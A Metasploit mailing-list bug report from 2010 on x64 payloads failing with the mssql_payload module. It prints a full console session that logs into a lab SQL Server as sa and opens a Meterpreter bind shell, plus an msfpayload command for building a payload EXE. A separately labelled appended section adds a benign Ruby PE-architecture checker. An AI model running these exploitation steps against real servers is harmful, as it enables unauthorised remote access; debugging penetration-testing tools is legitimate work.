Metasploit mailing list archives

Issues with x64 based payloads


From: David Kennedy <kennedyd013 () gmail com>
Date: Sat, 19 Jun 2010 23:37:43 -0400

Anyone experiencing issues when using mssql_payload against an x64-based system?
It worked fine about two weeks ago; however, it appears something may have
changed. Example below, tested on a Server 2008 x64:

root@bt:/pentest/exploits/framework3# msfconsole

                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888


       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 274 auxiliary
+ -- --=[ 209 payloads - 26 encoders - 8 nops
       =[ svn r9563 updated today (2010.06.19)

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set rhost 172.16.32.217
rhost => 172.16.32.217
msf exploit(mssql_payload) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(mssql_payload) > show options

Module options:

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PASSWORD                       no        The password for the specified username
   RHOST         172.16.32.217    yes       The target address
   RPORT         1433             yes       The target port
   USERNAME      sa               no        The username to authenticate as
   UseCmdStager  true             no        Wait for user input before returning from exploit
   VERBOSE       false            no        Enable verbose output


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The listen port
   RHOST     172.16.32.217    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(mssql_payload) > set password P@55w0rd
password => P@55w0rd
msf exploit(mssql_payload) > exploit

[*] Started bind handler
[*] Command Stager progress -   2.80% done (1499/53629 bytes)
[*] Command Stager progress -   5.59% done (2998/53629 bytes)
[*] Command Stager progress -   8.39% done (4497/53629 bytes)
[*] Command Stager progress -  11.18% done (5996/53629 bytes)
[*] Command Stager progress -  13.98% done (7495/53629 bytes)
[*] Command Stager progress -  16.77% done (8994/53629 bytes)
[*] Command Stager progress -  19.57% done (10493/53629 bytes)
[*] Command Stager progress -  22.36% done (11992/53629 bytes)
[*] Command Stager progress -  25.16% done (13491/53629 bytes)
[*] Command Stager progress -  27.95% done (14990/53629 bytes)
[*] Command Stager progress -  30.75% done (16489/53629 bytes)
[*] Command Stager progress -  33.54% done (17988/53629 bytes)
[*] Command Stager progress -  36.34% done (19487/53629 bytes)
[*] Command Stager progress -  39.13% done (20986/53629 bytes)
[*] Command Stager progress -  41.93% done (22485/53629 bytes)
[*] Command Stager progress -  44.72% done (23984/53629 bytes)
[*] Command Stager progress -  47.52% done (25483/53629 bytes)
[*] Command Stager progress -  50.31% done (26982/53629 bytes)
[*] Command Stager progress -  53.11% done (28481/53629 bytes)
[*] Command Stager progress -  55.90% done (29980/53629 bytes)
[*] Command Stager progress -  58.70% done (31479/53629 bytes)
[*] Command Stager progress -  61.49% done (32978/53629 bytes)
[*] Command Stager progress -  64.29% done (34477/53629 bytes)
[*] Command Stager progress -  67.08% done (35976/53629 bytes)
[*] Command Stager progress -  69.88% done (37475/53629 bytes)
[*] Command Stager progress -  72.67% done (38974/53629 bytes)
[*] Command Stager progress -  75.47% done (40473/53629 bytes)
[*] Command Stager progress -  78.26% done (41972/53629 bytes)
[*] Command Stager progress -  81.06% done (43471/53629 bytes)
[*] Command Stager progress -  83.85% done (44970/53629 bytes)
[*] Command Stager progress -  86.65% done (46469/53629 bytes)
[*] Command Stager progress -  89.44% done (47968/53629 bytes)
[*] Command Stager progress -  92.24% done (49467/53629 bytes)
[*] Command Stager progress -  95.03% done (50966/53629 bytes)
[*] Command Stager progress -  97.73% done (52410/53629 bytes)
[*] Command Stager progress - 100.00% done (53629/53629 bytes)
[*] Exploit completed, but no session was created.

msf exploit(mssql_payload) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(mssql_payload) > exploit

[*] Started bind handler
[*] Command Stager progress -   2.80% done (1499/53629 bytes)
[*] Command Stager progress -   5.59% done (2998/53629 bytes)
[*] Command Stager progress -   8.39% done (4497/53629 bytes)
[*] Command Stager progress -  11.18% done (5996/53629 bytes)
[*] Command Stager progress -  13.98% done (7495/53629 bytes)
[*] Command Stager progress -  16.77% done (8994/53629 bytes)
[*] Command Stager progress -  19.57% done (10493/53629 bytes)
[*] Command Stager progress -  22.36% done (11992/53629 bytes)
[*] Command Stager progress -  25.16% done (13491/53629 bytes)
[*] Command Stager progress -  27.95% done (14990/53629 bytes)
[*] Command Stager progress -  30.75% done (16489/53629 bytes)
[*] Command Stager progress -  33.54% done (17988/53629 bytes)
[*] Command Stager progress -  36.34% done (19487/53629 bytes)
[*] Command Stager progress -  39.13% done (20986/53629 bytes)
[*] Command Stager progress -  41.93% done (22485/53629 bytes)
[*] Command Stager progress -  44.72% done (23984/53629 bytes)
[*] Command Stager progress -  47.52% done (25483/53629 bytes)
[*] Command Stager progress -  50.31% done (26982/53629 bytes)
[*] Command Stager progress -  53.11% done (28481/53629 bytes)
[*] Command Stager progress -  55.90% done (29980/53629 bytes)
[*] Command Stager progress -  58.70% done (31479/53629 bytes)
[*] Command Stager progress -  61.49% done (32978/53629 bytes)
[*] Command Stager progress -  64.29% done (34477/53629 bytes)
[*] Command Stager progress -  67.08% done (35976/53629 bytes)
[*] Command Stager progress -  69.88% done (37475/53629 bytes)
[*] Command Stager progress -  72.67% done (38974/53629 bytes)
[*] Command Stager progress -  75.47% done (40473/53629 bytes)
[*] Command Stager progress -  78.26% done (41972/53629 bytes)
[*] Command Stager progress -  81.06% done (43471/53629 bytes)
[*] Command Stager progress -  83.85% done (44970/53629 bytes)
[*] Command Stager progress -  86.65% done (46469/53629 bytes)
[*] Command Stager progress -  89.44% done (47968/53629 bytes)
[*] Command Stager progress -  92.24% done (49467/53629 bytes)
[*] Command Stager progress -  95.03% done (50966/53629 bytes)
[*] Command Stager progress -  97.73% done (52410/53629 bytes)
[*] Sending stage (748032 bytes) to 172.16.32.217
[*] Command Stager progress - 100.00% done (53629/53629 bytes)
[*] Meterpreter session 1 opened (172.16.32.129:52110 -> 172.16.32.217:4444) at 2010-06-19 23:30:05 -0400

meterpreter >

Interestingly enough, if you just do msfpayload
windows/x64/meterpreter/bind_tcp LPORT=443 X > moo.exe and copy it over to
the system, it works.

Thanks!

Dave
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
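Added example, not from the original post and not Metasploit project code: when an x64 payload opens a session as a standalone msfpayload EXE but not when the same payload goes through the command stager, the first thing worth checking on the attacker side is the architecture of the PE that actually gets dropped. The script below parses the DOS header, the COFF Machine field and the optional-header Magic of an executable (such as the moo.exe produced above, or the file the command stager reassembles on the target, once retrieved) and reports whether it is a PE32 (x86) or PE32+ (x64) image, then compares that with what the Metasploit payload name promises. The function names, the `windows/x64/` naming check and the `make_pe_stub` header stub used as offline sample input are my own assumptions; the stub is a constructed header only, not a runnable binary, and nothing here identifies the cause of the failure reported in the post.

```ruby
# Added example: verify that an executable dropped for a Metasploit payload is
# the architecture its payload name implies (PE32 for windows/..., PE32+ for
# windows/x64/...). Offsets follow the PE/COFF file format; names are mine.

IMAGE_FILE_MACHINE_I386  = 0x014c
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC     = 0x10b   # optional-header Magic for a 32-bit image
PE32PLUS_MAGIC = 0x20b   # optional-header Magic for a 64-bit image

# Returns 'x86' or 'x64' for an in-memory PE image. Raises ArgumentError when
# the DOS/PE headers are malformed, truncated, or when the COFF Machine field
# and the optional-header Magic disagree (an image that cannot load as either).
def pe_arch(data)
  data = data.b
  raise ArgumentError, 'not an MZ executable' unless data.bytesize >= 0x40 && data.byteslice(0, 2) == 'MZ'.b
  e_lfanew = data.byteslice(0x3c, 4).unpack1('V')            # offset of the PE signature
  raise ArgumentError, 'truncated headers' unless data.bytesize >= e_lfanew + 26
  raise ArgumentError, 'missing PE signature' unless data.byteslice(e_lfanew, 4) == "PE\0\0".b
  machine  = data.byteslice(e_lfanew + 4, 2).unpack1('v')    # IMAGE_FILE_HEADER.Machine
  opt_size = data.byteslice(e_lfanew + 20, 2).unpack1('v')   # SizeOfOptionalHeader
  raise ArgumentError, 'no optional header (object file, not an image)' if opt_size.zero?
  magic = data.byteslice(e_lfanew + 24, 2).unpack1('v')      # IMAGE_OPTIONAL_HEADER.Magic
  return 'x86' if machine == IMAGE_FILE_MACHINE_I386 && magic == PE32_MAGIC
  return 'x64' if machine == IMAGE_FILE_MACHINE_AMD64 && magic == PE32PLUS_MAGIC
  raise ArgumentError, format('inconsistent headers: machine=0x%04x magic=0x%03x', machine, magic)
end

# Assumed naming convention: Metasploit x64 Windows payloads live under
# windows/x64/; everything else under windows/ is 32-bit.
def payload_arch(payload_name)
  payload_name.start_with?('windows/x64/') ? 'x64' : 'x86'
end

# Returns [ok, message]; ok is false for a mismatch or an unparseable file.
def check_dropped_exe(data, payload_name)
  want = payload_arch(payload_name)
  have = pe_arch(data)
  [have == want, "#{payload_name}: expected #{want} image, got #{have}"]
rescue ArgumentError => e
  [false, "#{payload_name}: unparseable PE (#{e.message})"]
end

# Constructed minimal PE header (DOS header, PE signature, COFF header and a
# zeroed optional header, no sections). Sample input for offline testing only;
# a real msfpayload EXE has the same header layout but is a complete image.
def make_pe_stub(machine, magic)
  opt_size = magic == PE32PLUS_MAGIC ? 0xf0 : 0xe0
  dos  = 'MZ'.b + ("\0" * 0x3a).b + [0x40].pack('V')          # e_lfanew at 0x3c -> 0x40
  coff = [machine, 1, 0, 0, 0, opt_size, 0x0002].pack('vvVVVvv')
  opt  = [magic].pack('v') + ("\0" * (opt_size - 2)).b
  dos + "PE\0\0".b + coff + opt
end

# Usage: ruby pe_arch_check.rb moo.exe windows/x64/meterpreter/bind_tcp
if __FILE__ == $PROGRAM_NAME && ARGV.length == 2
  path, payload = ARGV
  ok, msg = check_dropped_exe(File.binread(path), payload)
  puts msg
  exit(ok ? 0 : 1)
end
```

Run it against the EXE before staging it; an x86 result for a windows/x64/ payload, or an "inconsistent headers" error, means the file on disk cannot be the 64-bit image the payload needs, and the stager path should be compared with the standalone msfpayload output byte for byte.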
